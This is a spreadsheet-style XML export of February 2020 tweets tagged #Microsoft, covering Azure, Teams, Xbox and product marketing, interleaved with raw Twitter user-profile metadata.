    <t>{'id': 2981510327, 'id_str': '2981510327', 'name': 'AApro Limited', 'screen_name': 'AAproLTD', 'location': 'Hull, England', 'description': '#Retro #Computer #Parts #Digital #Cameras #Laptop #Graphic #Cards #Sound #Audio #Vintage #IT', 'url': 'http://t.co/CruNskz32W', 'entities': {'url': {'urls': [{'url': 'http://t.co/CruNskz32W', 'expanded_url': 'http://AAPRO.CO.UK', 'display_url': 'AAPRO.CO.UK', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 201, 'friends_count': 947, 'listed_count': 4, 'created_at': 'Fri Jan 16 18:22:46 +0000 2015', 'favourites_count': 12, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 11862,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'http://pbs.twimg.com/profile_images/785175784772268032/fVuFYksU_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/785175784772268032/fVuFYksU_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2981510327/1476035459', 'profile_link_color': '01506F',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</si>
  <si>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20:43:01 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft has rolled out experimental support for gRPC-Web in .NET Core and ASP. NET Core, allowing gRPC-Web to be called directly from the .NET Core gRPC client and ASP. NET Core gRPC apps https://t.co/XrgCTD5ck6 #developers</t>
  </si>
  <si>
    <t>{'id': 44115700, 'id_str': '44115700', 'name': 'K2 Partnering', 'screen_name': 'K2Partnering', 'location': 'Global', 'description': 'The global leader in #SAP, #salesforce, #ERP, #cloud, #bigdata #tech solutions &amp; #staffing. @K2HotJobs for latest roles. @K2University for courses.', 'url': 'http://t.co/TwsRIimsSL', 'entities': {'url': {'urls': [{'url': 'http://t.co/TwsRIimsSL', 'expanded_url': 'http://k2partnering.com/', 'display_url': 'k2partnering.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 5127, 'friends_count': 4942, 'listed_count': 468, 'created_at': 'Tue Jun 02 13:18:09 +0000 2009', 'favourites_count': 1941, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 12441, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '1C1D1F', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1192382722863509504/Dn8oFJTZ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1192382722863509504/Dn8oFJTZ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/44115700/1573060822', 'profile_link_color': 'B6121B',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</si>
  <si>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20:41:35 +0000 2020</t>
  </si>
  <si>
    <t>The first episode in Microsoft's new series around #quantum computing and the impact it's having today. #Microsoft # Edgecomputing #AI #healthcare #climatechange https://t.co/lEUUDB09Fd</t>
  </si>
  <si>
    <t>Wed Feb 26 20:41:20 +0000 2020</t>
  </si>
  <si>
    <t>Real-Time Human Pose Recognition in Parts from Single Depth Images, Check this out !
#AI #AIForEveryone #Microsoft #Xbox #RandomForest #DecisionForest #ML #DL #Mathematics #MachineLearning
#Recognition #Classifier @Azure 
https://t.co/9elPxqph9G</t>
  </si>
  <si>
    <t>{'id': 174400537, 'id_str': '174400537', 'name': 'Pacome Koudou ðŸ‘¨ðŸ¾\u200dðŸ’»', 'screen_name': 'Pac_Kd', 'location': 'Toronto, Ontario', 'description': 'Passionately curious for a smarter world. #DataScientist #BigDataArchitectures #ML #AI MSc MathsðŸ‘¨ðŸ¾\u200dðŸŽ“ðŸ‘¨ðŸ¾\u200dðŸ’». The Crossâœï¸ #AIForEveryone, Founder @tethysinc', 'url': 'https://t.co/BELSnJ1EaF', 'entities': {'url': {'urls': [{'url': 'https://t.co/BELSnJ1EaF', 'expanded_url': 'https://ca.linkedin.com/in/ulysse-pac%C3%B4me-koudou-9b04a180', 'display_url': 'ca.linkedin.com/in/ulysse-pac%â€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2413, 'friends_count': 2345, 'listed_count': 14, 'created_at': 'Tue Aug 03 21:02:39 +0000 2010', 'favourites_count': 19590, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6963,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'http://pbs.twimg.com/profile_images/1146134897578446848/gOiIOzLV_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1146134897578446848/gOiIOzLV_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/174400537/1558642639', 'profile_link_color': '89C9FA',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</si>
  <si>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20:40:00 +0000 2020</t>
  </si>
  <si>
    <t>Multi-Company Superpowers for Management Firms - Gravity Software https://t.co/puChO4oFXC by @vsilvani
#RemoteWork #Mobile #Applications #Microsoft #PowerBI #MicrosoftFlow #Patrons #Hospitality #BillingSoftware #MultiSite #Companies #franchise #CRM #ERP #BetterTogether https://t.co/d342NFohUK</t>
  </si>
  <si>
    <t>Wed Feb 26 20:39:10 +0000 2020</t>
  </si>
  <si>
    <t>HPE and #Microsoft #HybridCloud Summit presentation videos available now. Includes discussions of Azure Stack HCI vs. Azure Stack Hub and Hybrid Cloud US Market Perspective. #USEnterpriseEast  #HPEMSFT #azurestackhub 
https://t.co/qNgfjOTDn0 https://t.co/9JjdsO8tit</t>
  </si>
  <si>
    <t>Wed Feb 26 20:38:55 +0000 2020</t>
  </si>
  <si>
    <t>Thrilled to announce my company's 17th anniversary this coming April! What a milestone.  I guess all those years of doing orders instead of my homework paid off.  #Giveaway details coming soon! #entreprenur #investor #microsoft</t>
  </si>
  <si>
    <t>{'id': 15442515, 'id_str': '15442515', 'name': 'Jamie M. Timbre', 'screen_name': 'jtimbre', 'location': 'Michigan âœˆ NYC', 'description': 'Award-winning entrepreneur, #Microsoft Evangelist/Consultant, writer, speaker, + Angel Investor. I earn my crown in this part of town! â™›', 'url': 'https://t.co/D345JDzg4n', 'entities': {'url': {'urls': [{'url': 'https://t.co/D345JDzg4n', 'expanded_url': 'http://facebook.com/jamietimbre', 'display_url': 'facebook.com/jamietimbre', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 73146, 'friends_count': 141, 'listed_count': 218, 'created_at': 'Tue Jul 15 16:39:07 +0000 2008', 'favourites_count': 1936, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 40323,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'http://pbs.twimg.com/profile_images/1196464419854856194/vCJoFjsp_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1196464419854856194/vCJoFjsp_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/15442515/1399226999', 'profile_link_color': '13A9A4', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': '001717', 'profile_text_color': '004A4D', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Feb 26 20:35:09 +0000 2020</t>
  </si>
  <si>
    <t>Score your newest gadget on our platform to instantly earn bragging rights on your friends! 
-
-
-
-
-
-
#tech #apple #mac #microsoft #android #advancement #cuttingedge #appleiphone #smartphone #computer #techcrunch #laptop #techguy #tesla #hoverboard #elonmusk #applewatch https://t.co/8tRZ9cfGUB</t>
  </si>
  <si>
    <t>{'id': 104913210, 'id_str': '104913210', 'name': 'ManScore', 'screen_name': 'ManScore', 'location': 'Chicago, IL', 'description': 'He who dies with the most points wins!  ManScore is creating the list of everything a guy should strive to do in his life!\n\nDownload the Man Score App on Itunes', 'url': 'http://t.co/ljMLdFZiqw', 'entities': {'url': {'urls': [{'url': 'http://t.co/ljMLdFZiqw', 'expanded_url': 'http://www.manscore.com/', 'display_url': 'manscore.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 8964, 'friends_count': 4200, 'listed_count': 69, 'created_at': 'Thu Jan 14 19:54:23 +0000 2010', 'favourites_count': 457, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1365,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'http://pbs.twimg.com/profile_images/616608378853310464/5QjQbJmZ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/616608378853310464/5QjQbJmZ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/104913210/1479052389',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</si>
  <si>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20:35:02 +0000 2020</t>
  </si>
  <si>
    <t>Empower end-users with advanced #data processing and connectivity.  
@Schematiq Workbench delivers new data #processing &amp;amp; #analytic capabilities to #Microsoft #Excel users, &amp;amp; addresses several limitations 
#ClickLink: https://t.co/4Dw0MNKn47 
#Workbench #Analytics #Automation https://t.co/fuWmEYvl5y</t>
  </si>
  <si>
    <t>Wed Feb 26 20:34:43 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft is opening a new #Azure region in Spain and working with @Telefonica to build out their #AI -powered network to power Industry 4.0! https://t.co/igGbyJ8GNc</t>
  </si>
  <si>
    <t>Wed Feb 26 20:33:36 +0000 2020</t>
  </si>
  <si>
    <t>Dude. This better be real. Wifey will have an amazing Christmas present coming her way 
#XboxSeriesX #XboxOne #Microsoft #HaloInfinite #halo #consolegaming #rosegold https://t.co/RRXEyhNJei</t>
  </si>
  <si>
    <t>{'id': 1202406730770059269, 'id_str': '1202406730770059269', 'name': 'Lil Painyuh', 'screen_name': 'painyuh', 'location': 'OH', 'description': '~ Full time Video Editor - Part time gamer - Man U &amp; Detroit Red Wings ~', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 15, 'friends_count': 72, 'listed_count': 0, 'created_at': 'Thu Dec 05 01:58:58 +0000 2019', 'favourites_count': 274, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 37, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1212909143859908608/LAtsLInj_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1212909143859908608/LAtsLInj_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1202406730770059269/1578015050',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</si>
  <si>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20:31:55 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft and #Telefonica are expanding their global strategic partnership to help mutual customers more quickly and easily. New Azure datacenter region in Spain! https://t.co/DQWLLROK90</t>
  </si>
  <si>
    <t>{'id': 95948968, 'id_str': '95948968', 'name': 'Rodrigo Barbaresco', 'screen_name': 'rodbarba', 'location': 'SÃ£o Paulo', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 277, 'friends_count': 380, 'listed_count': 10, 'created_at': 'Thu Dec 10 17:49:47 +0000 2009', 'favourites_count': 2694, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3008,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'http://pbs.twimg.com/profile_images/766243021402804225/HARPr7qN_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/766243021402804225/HARPr7qN_normal.jpg',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</si>
  <si>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Feb 26 20:30:21 +0000 2020</t>
  </si>
  <si>
    <t>Growing up with two parents who are deaf, Heather Dowdy has always been drawn to advocating for those with disabilities. #Microsoft.  #AIforAccessibility  #WomenInSTEM #WomenInScience  #technology #tech #education https://t.co/sOZYeyk7BJ</t>
  </si>
  <si>
    <t>Wed Feb 26 20:23:22 +0000 2020</t>
  </si>
  <si>
    <t>#Hackers Scanning for Vulnerable #Microsoft Exchange Servers, Patch Now! #Cybersecurity  https://t.co/dglBc0FA52</t>
  </si>
  <si>
    <t>Wed Feb 26 20:22:13 +0000 2020</t>
  </si>
  <si>
    <t>Heart Research Institute is making cardiovascular disease a thing of the past. #Microsoft #Teams is making real-time collaboration a thing of the present. Watch them both come together in this uplifting video.
https://t.co/4cAjgjAEmp</t>
  </si>
  <si>
    <t>Wed Feb 26 20:20:24 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft is adding a secret SkiFree-like surfing game into its Edge browser https://t.co/78G7HvsPk5 #Microsoft</t>
  </si>
  <si>
    <t>Wed Feb 26 20:20:13 +0000 2020</t>
  </si>
  <si>
    <t>So in the coming years, Alyx (#HalfLife) game in VR won't be realistic enough, but Flight / Forza / World / Life Simulator will be the next big thing!
#Gaming #AI #ML #Simulator #World #Microsoft #Floght #Forza</t>
  </si>
  <si>
    <t>{'id': 1104636368, 'id_str': '1104636368', 'name': 'Avi Barel', 'screen_name': '4Barel', 'location': 'Israel', 'description': 'CEO at #HoverSense &amp; https://t.co/Tm5kCvJdSI | Ex UX Lead at @Microsoft, @Cisco, NDS | Passionate about:\n#Tech #Innovation #Startups #AR #XR #AI #UX #UI #Fed', 'url': 'https://t.co/3uAEdkJxpr', 'entities': {'url': {'urls': [{'url': 'https://t.co/3uAEdkJxpr', 'expanded_url': 'http://www.linkedin.com/in/abarel/', 'display_url': 'linkedin.com/in/abarel/', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/Tm5kCvJdSI', 'expanded_url': 'http://StartUX.net', 'display_url': 'StartUX.net', 'indices': [21, 44]}]}}, 'protected': False, 'followers_count': 666, 'friends_count': 479, 'listed_count': 34, 'created_at': 'Sat Jan 19 20:51:33 +0000 2013', 'favourites_count': 1576, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2712, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'ABB8C2', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme2/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme2/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1074835419081175041/th1k8ALt_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1074835419081175041/th1k8ALt_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1104636368/1490361923',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</si>
  <si>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20:20:12 +0000 2020</t>
  </si>
  <si>
    <t>What's next? Forza? or even WORLD / Life Simulator?
Think about it, Microsoft (&amp;amp; Google) got all the #BigData needed in order to make it accurate enough for realistic #VR/#XR games.
https://t.co/XuFsT8eZ0W
#Gaming #AI #ML #Simulator #World #Microsoft #Floght #Forza #Google #UX</t>
  </si>
  <si>
    <t>Wed Feb 26 20:17:28 +0000 2020</t>
  </si>
  <si>
    <t>Digitally Transform Your Enterprise with Power Automate:  Our Journey to Enable Your Digital Transformation, Part 2 - #MicrosoftFlow #Microsoft  #InsightRun - https://t.co/pJwrzaWFJP</t>
  </si>
  <si>
    <t>Wed Feb 26 20:17:04 +0000 2020</t>
  </si>
  <si>
    <t>#Oracle and #Microsoft have added to their #cloud interconnect strategy with the addition of a high-speed, private connection between Oracle Cloud Infrastructure and #Azure in the #EU. https://t.co/u7vfNHQVkJ https://t.co/N4pUFHzTYQ</t>
  </si>
  <si>
    <t>{'id': 113832151, 'id_str': '113832151', 'name': 'PTi', 'screen_name': '_pti_', 'location': 'Rancho Santa Margarita, CA', 'description': '', 'url': 'http://t.co/1DRAM5Zwwe', 'entities': {'url': {'urls': [{'url': 'http://t.co/1DRAM5Zwwe', 'expanded_url': 'http://www.predictive-technologies.com', 'display_url': 'predictive-technologies.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 9, 'friends_count': 1, 'listed_count': 2, 'created_at': 'Sat Feb 13 05:38:49 +0000 2010', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1712,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'http://pbs.twimg.com/profile_images/1368077682/PTi_logo_rgb_notag__180x109__normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1368077682/PTi_logo_rgb_notag__180x109__normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/113832151/1553802594',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</si>
  <si>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20:16:21 +0000 2020</t>
  </si>
  <si>
    <t>Successful #Microsoft #Teams event @DorsetCouncilUK today. Offering a robust development platform. Lots of users finding out about #O365 products. Buzzy, vibrant atmos, over 150 colleagues finding answers and seeing application potential. #servicedesign #adoption #Digital #Agile</t>
  </si>
  <si>
    <t>{'id': 1231475522414182400, 'id_str': '1231475522414182400', 'name': 'helsbels', 'screen_name': 'tinytweeta1', 'location': '', 'description': 'interested in people, service design, tech, triathlon, skiing, road cycling, eating less meat and drinking more coffee â˜•ï¸', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 11, 'friends_count': 27, 'listed_count': 0, 'created_at': 'Sun Feb 23 07:07:24 +0000 2020', 'favourites_count': 72,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'http://pbs.twimg.com/profile_images/1233132194253676545/WZvwVH3__normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1233132194253676545/WZvwVH3__normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1231475522414182400/1582836601',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</si>
  <si>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20:13:41 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve"> #Coronavirus fears on Monday helped erase more than $200 billion from the combined market capitalization of #Apple, the #Google parent #Alphabet, #Amazon, #Microsoft, and #Facebook.
https://t.co/fcU2pgPTjb</t>
  </si>
  <si>
    <t>{'id': 1860999546, 'id_str': '1860999546', 'name': 'Kevin Schwesinger', 'screen_name': 'KevSchwesinger', 'location': 'New York, NY', 'description': 'IT #Staffing Solutions - Experience the Difference Working With Professionals That Understand Your #IT Needs and the Importance of Managing Your Costs', 'url': 'https://t.co/5RMTceqxV7', 'entities': {'url': {'urls': [{'url': 'https://t.co/5RMTceqxV7', 'expanded_url': 'http://www.perennialresources.com', 'display_url': 'perennialresources.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 172, 'friends_count': 322, 'listed_count': 27, 'created_at': 'Fri Sep 13 16:09:09 +0000 2013', 'favourites_count': 223, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2247,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'http://pbs.twimg.com/profile_images/378800000452142940/503e184abf889ec971495728297032ed_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000452142940/503e184abf889ec971495728297032ed_normal.jpeg',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</si>
  <si>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20:13:37 +0000 2020</t>
  </si>
  <si>
    <t>My take on the Microsoft Ignite Tour in Washington DC #Artificialintelligence #SaaS  #startups #Microsoft #MicrosoftIgniteTour #Azure #AI #cloud #cybersecurity https://t.co/PhBNbkEMSo</t>
  </si>
  <si>
    <t>{'id': 988293107144945664, 'id_str': '988293107144945664', 'name': 'Linxin Gu', 'screen_name': 'GuLinxin', 'location': 'Washington, DC', 'description': 'Founder of Organization for Science Technology and International Affairs @JohnsHopkins | Development Finance Analyst @UNDP | Tech, Entrepreneurship and Policy', 'url': 'https://t.co/jNqtejKVJe', 'entities': {'url': {'urls': [{'url': 'https://t.co/jNqtejKVJe', 'expanded_url': 'http://linkedin.com/in/linxingu', 'display_url': 'linkedin.com/in/linxingu', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 12, 'friends_count': 188, 'listed_count': 0, 'created_at': 'Mon Apr 23 05:46:53 +0000 2018', 'favourites_count': 6, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 19, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1233325483200303106/-aNXgX5y_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1233325483200303106/-aNXgX5y_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/988293107144945664/1545660756',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</si>
  <si>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20:13:29 +0000 2020</t>
  </si>
  <si>
    <t>The latest #Microsoft Vendor Rating is published https://t.co/WugdKvcDD1</t>
  </si>
  <si>
    <t>{'id': 893428964605267968, 'id_str': '893428964605267968', 'name': 'Jo Liversidge', 'screen_name': 'jo_liversidge', 'location': 'New Zealand', 'description': '@Gartner_inc analyst, prolific tea drinker, occasionally a flat white, owner of kittens. Opinions are my own. #Gartner #SaaS #Software #Salesforce', 'url': 'https://t.co/RxKS3q4hRm', 'entities': {'url': {'urls': [{'url': 'https://t.co/RxKS3q4hRm', 'expanded_url': 'https://www.gartner.com/analyst/56029/Jo-Liversidge', 'display_url': 'gartner.com/analyst/56029/â€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 294, 'friends_count': 486, 'listed_count': 5, 'created_at': 'Fri Aug 04 11:10:39 +0000 2017', 'favourites_count': 2079, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1113,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'http://pbs.twimg.com/profile_images/893435270682611712/W67HuBgv_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/893435270682611712/W67HuBgv_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/893428964605267968/1519665950',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</si>
  <si>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20:12:35 +0000 2020</t>
  </si>
  <si>
    <t>"Technology's a natural extension of how we do our job. (It) has to fit into the experience for our co-workers and our customers," said @NewBelgium. #Dynamics365 #CRM empowers it. A #Microsoft partner, Southwest Modern Data Systems, Inc. can too. https://t.co/otVkYSUi4g</t>
  </si>
  <si>
    <t>Wed Feb 26 20:11:45 +0000 2020</t>
  </si>
  <si>
    <t>Unify your data on a single platform and bring insights to everyone. Take the next step in your digital transformationdownload the e-book, Four ways to maximize your #BI investments: 
https://t.co/dDYXNlmew3 #digitaltransformation #microsoft https://t.co/8K9TaCzroK</t>
  </si>
  <si>
    <t>Wed Feb 26 20:10:45 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft announces general availability of Azure Sphere, the company's integrated security solution for IoT devices and equipment: https://t.co/SPyvUKODps
#ITDepartment</t>
  </si>
  <si>
    <t>{'id': 407760876, 'id_str': '407760876', 'name': 'TechDecisions', 'screen_name': 'MyTechDecisions', 'location': 'Boston', 'description': 'Where technology decision makers go for insight, opinions and answers.', 'url': 'https://t.co/td5uPxcFOD', 'entities': {'url': {'urls': [{'url': 'https://t.co/td5uPxcFOD', 'expanded_url': 'https://mytechdecisions.com/', 'display_url': 'mytechdecisions.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1836, 'friends_count': 1003, 'listed_count': 108, 'created_at': 'Tue Nov 08 14:25:53 +0000 2011', 'favourites_count': 256, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 10933, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '18384E', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/765653540375302145/a7Bu84UW_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/765653540375302145/a7Bu84UW_normal.jpg', 'profile_link_color': '0084B4', 'profile_sidebar_border_color': 'E0B020', 'profile_sidebar_fill_color': '18384E', 'profile_text_color': 'F5FAFA', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Feb 26 20:10:34 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft plans to remove its carbon footprint https://t.co/lqAmgEWKk9 #CarbonNegative #Carbonfootprint #environment #Microsoft</t>
  </si>
  <si>
    <t>{'id': 214839193, 'id_str': '214839193', 'name': 'LS Retail Official', 'screen_name': 'LSRetailChat', 'location': 'Reykjavik', 'description': 'Global software provider for #Retail, #Restaurants, #FoodService, #Forecourt and #Pharmacy businesses, offering fully integrated #PointOfSale and #ERP systems.', 'url': 'http://t.co/vc82jyFArM', 'entities': {'url': {'urls': [{'url': 'http://t.co/vc82jyFArM', 'expanded_url': 'http://www.lsretail.com', 'display_url': 'lsretail.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1302, 'friends_count': 128, 'listed_count': 370, 'created_at': 'Fri Nov 12 10:52:18 +0000 2010', 'favourites_count': 325, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 13258, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '0E3A73', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1057964772321320961/g-uPr2gX_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1057964772321320961/g-uPr2gX_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/214839193/1541073372', 'profile_link_color': '050505',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</si>
  <si>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20:10:16 +0000 2020</t>
  </si>
  <si>
    <t>Had an on-site about #Microsoft Cloud App Security. #MCAS......want!! 
Not only discover but apply action/governance based on X. My focus at the start of the engagement was around tracking/securing OAuth but now  
Worth checking out if you use the Office365 suite or AzureAD</t>
  </si>
  <si>
    <t>{'id': 915384905374330880, 'id_str': '915384905374330880', 'name': 'Ash MoranðŸ’¤', 'screen_name': 'securethelogs', 'location': '', 'description': '#Blueteam, #InfraSec Engineer who runs the #infosec site: https://t.co/18Yfomm1QK / Lover of all things #PowerShell ðŸ’» : Github: https://t.co/8CId2bVN1L', 'url': 'https://t.co/EqobcRIbmn', 'entities': {'url': {'urls': [{'url': 'https://t.co/EqobcRIbmn', 'expanded_url': 'http://Securethelogs.com', 'display_url': 'Securethelogs.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/18Yfomm1QK', 'expanded_url': 'http://securethelogs.com/', 'display_url': 'securethelogs.com', 'indices': [58, 81]}, {'url': 'https://t.co/8CId2bVN1L', 'expanded_url': 'https://github.com/securethelogs', 'display_url': 'github.com/securethelogs', 'indices': [128, 151]}]}}, 'protected': False, 'followers_count': 112, 'friends_count': 1059, 'listed_count': 2, 'created_at': 'Wed Oct 04 01:15:43 +0000 2017', 'favourites_count': 516, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1467, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1211701689650221056/T1X3A-BJ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1211701689650221056/T1X3A-BJ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/915384905374330880/1579042549',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</si>
  <si>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20:10:08 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft is adding a secret SkiFree-like surfing game into its Edge browser https://t.co/RKAV4Y4324 https://t.co/W4QHp8JCJw</t>
  </si>
  <si>
    <t>Wed Feb 26 20:09:26 +0000 2020</t>
  </si>
  <si>
    <t>Ready to launch your IoT initiatives? View this infographic to learn why #Microsoft IoT Central provides the 3 main things every platform must have to ensure success. https://t.co/1dahFwcFVV</t>
  </si>
  <si>
    <t>Wed Feb 26 20:07:40 +0000 2020</t>
  </si>
  <si>
    <t>Secure and seamless business continuity is possible! Nakilat improved efficiency and cut operating costs in half with #Microsoft SaaS solutions. Contact Filius Bonacci to learn how you can too. https://t.co/FQKrhq8jQi</t>
  </si>
  <si>
    <t>{'id': 903056023354609664, 'id_str': '903056023354609664', 'name': 'Filius Bonacci', 'screen_name': 'FilBonacci', 'location': 'Oregon, USA', 'description': 'Experts in reporting and data visualization, budgeting, planning, and forecasting processes, and data warehouses and integrations.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 12, 'friends_count': 25, 'listed_count': 1, 'created_at': 'Thu Aug 31 00:45:08 +0000 2017', 'favourites_count': 282, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 295, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/938148217732046849/B_MxRMJB_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/938148217732046849/B_MxRMJB_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/903056023354609664/1504225196',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</si>
  <si>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20:06:15 +0000 2020</t>
  </si>
  <si>
    <t>Fully Certified Training at the #Microsoft Approved Online Training Course - Raise your career expectations  Study at your own pace  Get Certified - https://t.co/hHlcnus0xt https://t.co/y82GeKnHVe</t>
  </si>
  <si>
    <t>Wed Feb 26 20:06:08 +0000 2020</t>
  </si>
  <si>
    <t>With no extended support for SQL Server 2008 and 2008 R2, it's time to modernize. Contact High Performance Systems Inc to start your transformation journey with #SQLServer 2017, #Windows Server 2016 and #Microsoft #Azure. https://t.co/3CavmIHWr3</t>
  </si>
  <si>
    <t>Wed Feb 26 20:03:06 +0000 2020</t>
  </si>
  <si>
